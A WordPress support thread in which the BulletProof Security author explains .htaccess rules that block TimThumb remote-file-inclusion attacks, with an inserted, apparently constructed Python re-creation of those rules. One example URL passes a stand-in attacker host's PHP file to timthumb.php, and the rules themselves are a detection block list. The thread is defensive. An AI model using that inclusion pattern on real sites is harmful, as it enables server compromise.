Support » Plugin: BulletProof Security » Tim Thumb Code

  • Resolved flyfisher842

    (@flyfisher842)


    I recently purchased a plugin for image manipulation. After purchase I found it uses Tim Thumb code. Is there any way to make TT code safe to run, as in a protected mode or something? I looked at the timthumb php page and saw something about protected. I uninstalled the plugin because security is more important than image manipulation. And my money goes with BPS.

    https://wordpress.org/plugins/bulletproof-security/

Viewing 10 replies - 1 through 10 (of 10 total)
  • Plugin Author AITpro

    (@aitpro)

    All new timthumb scripts (as of a couple of years ago and a few versions of timthumb scripts ago) should be safe to use. BPS also includes root .htaccess code to protect timthumb scripts from being exploited. You can also check with the plugin creator of that plugin to ask if the timthumb script is a current version that is not vulnerable/exploitable.

    # TIMTHUMB FORBID RFI and MISC FILE SKIP/BYPASS RULE
    # Use BPS Custom Code to modify/edit/change this code and to save it permanently.
    # Remote File Inclusion (RFI) security rules
    # Note: Only whitelist your additional domains or files if needed - do not whitelist hacker domains or files
    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
    RewriteRule .* index.php [F]
    #
    # Example: Whitelist additional misc files: (example\.php|another-file\.php|phpthumb\.php|thumb\.php|thumbs\.php)
    RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
    # Example: Whitelist additional website domains: RewriteCond %{HTTP_REFERER} ^.*(YourWebsite.com|AnotherWebsite.com).*
    RewriteCond %{HTTP_REFERER} ^.*example\.com.*
    RewriteRule . - [S=1]

    Thanks for the answer. Now to see if I can understand it. htaccess code is not my long suit.

    Plugin Author AITpro

    (@aitpro)

    This is standard BPS htaccess code already included in the BPS root .htaccess file and you do not need to do anything to it – it automatically protects your site against any/all RFI attacks. The timthumb vulnerability/exploit/attack that was occurring a while back was an RFI attack – Remote File Inclusion attack.

    The code allows timthumb scripts to be called if the HTTP Referer is your website. If the HTTP Referer is not your website – remote attacker website – then the RFI attack would be blocked.

    Plugin Author AITpro

    (@aitpro)

    The way I commonly see timthumb scripts used is like this:

    Legitimate timthumb script call - The Referer is your website domain:
    http://example.com/blah/timthumb.php?src=http://example.com/do-something-here
    
    Timthumb hack - the Referer is NOT your website domain:
    http://example.com/blah/timthumb.php?src=http://hacker-website.com/hacker-file.php

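    To see what the .htaccess rules quoted earlier in the thread and the legitimate/hack URLs above actually match, here is an added Python re-creation of the two RewriteCond groups (constructed for this thread, not BPS code). It assumes example.com is the site's own domain, that Apache's NC flag corresponds to re.IGNORECASE, and that QUERY_STRING, THE_REQUEST and REQUEST_URI are derived from the raw request line as shown.

```python
import re

# Constructed re-creation of the BPS "TIMTHUMB FORBID RFI" rules quoted in the thread.
# Assumption: the regexes are copied verbatim; NC == re.IGNORECASE; Apache does not
# URL-decode QUERY_STRING, which is why the rule lists both %3A/%2F and :/ forms.
REMOTE_HOSTS = (r"(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|"
                r"imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|"
                r"kkc|start-thegame)")
RFI_RE = re.compile(r"^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?" + REMOTE_HOSTS
                    + r".*$", re.IGNORECASE)
THUMB_RE = re.compile(r"(timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php)", re.IGNORECASE)
OWN_SITE_RE = re.compile(r"^.*example\.com.*", re.IGNORECASE)  # whitelist line, placeholder domain


def _path_and_query(request_line):
    # THE_REQUEST looks like "GET /path?query HTTP/1.1"; take the middle token.
    return request_line.split(" ")[1]


def rfi_blocked(request_line):
    """True if the first rule group (RewriteRule .* index.php [F]) would answer 403."""
    query = _path_and_query(request_line).partition("?")[2]          # QUERY_STRING
    return bool(RFI_RE.match(query) or RFI_RE.match(request_line))   # [OR] between the two conds


def thumb_skip_applies(request_line, referer):
    """True if the second group's [S=1] skip fires: a thumb script requested
    with the site's own domain in the Referer header."""
    uri = _path_and_query(request_line).partition("?")[0]            # REQUEST_URI
    return bool(THUMB_RE.search(uri) and referer and OWN_SITE_RE.match(referer))


def evaluate(request_line, referer):
    return {"rfi_blocked": rfi_blocked(request_line),
            "thumb_skip": thumb_skip_applies(request_line, referer)}


if __name__ == "__main__":
    # Constructed sample requests; hostnames are the placeholders used in the thread.
    samples = [
        ("GET /blah/timthumb.php?src=http://example.com/do-something-here HTTP/1.1",
         "http://example.com/gallery"),
        ("GET /blah/timthumb.php?src=http://www.imgur.com/x.png HTTP/1.1", "http://example.com/"),
        ("GET /blah/timthumb.php?src=http%3A%2F%2Fphotobucket.com%2Fa.jpg HTTP/1.1", None),
        ("GET /blah/timthumb.php?src=http://hacker-website.com/hacker-file.php HTTP/1.1",
         "http://hacker-website.com/"),
    ]
    for line, ref in samples:
        print(line, ref, evaluate(line, ref))
```

    Note that the first group is a fixed list of named image hosts, so the hacker-website.com URL from the thread is not caught by it; only the Referer-based second group distinguishes that request from a legitimate one.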
    Got it. I knew the code was in the htaccess but did not understand what it did. I trusted you to know or it would not have been in there. Thanks for the explanation and examples. This makes it clear what the code stops. And it explains why a screen in the plugin went blank. There is a login screen to a members area in the plugin that went blank the second time I tried it. And it is still blank. Could be the plugin but I don’t think so. The site is http://www.youzign.com. Some pretty impressive image manipulation. But I think there are some other plugins on the repository that will do as well.

    I would still test this plugin I purchased for quite a while on a throwaway test bed account before putting it on a production site.

    Plugin Author AITpro

    (@aitpro)

    If BPS is blocking anything it will be logged in the BPS Security Log. If the members login area is using the WordPress login page then there could be a direct conflict with BPS Login Security and that plugin’s member login. If that plugin is creating and using its own login page then there would probably not be a direct conflict. Typically you can only use one login security plugin at a time since they are doing the same or very similar things and calling the same WordPress Hooks – actions and filters. To confirm or eliminate BPS as having anything to do with the blank page in that plugin, do the standard BPS troubleshooting steps below.

    BPS Troubleshooting Steps:
    1. Check your BPS Security Log for any log entries related to that plugin.
    2. Deactivate Root folder BulletProof Mode and test the other plugin.
    3. Turn off BPS Login Security and test the other plugin.

    I am not going to use their plugin. It may be fine but I don’t feel comfortable trusting them. Have asked for a refund and will delete the plugin. It is not worth the risk. Thanks for the help.

    Plugin Author AITpro

    (@aitpro)

    Oh ok. Please resolve this thread then. Thanks.

    Sorry forgot to close it.

    Plugin Author AITpro

    (@aitpro)

    No need to apologize. I was not nailing you or anything. We go into autopilot mode and answer anything that is a question or resembles a question. So our off button = “thread resolved” ha ha ha.

  • The topic ‘Tim Thumb Code’ is closed to new replies.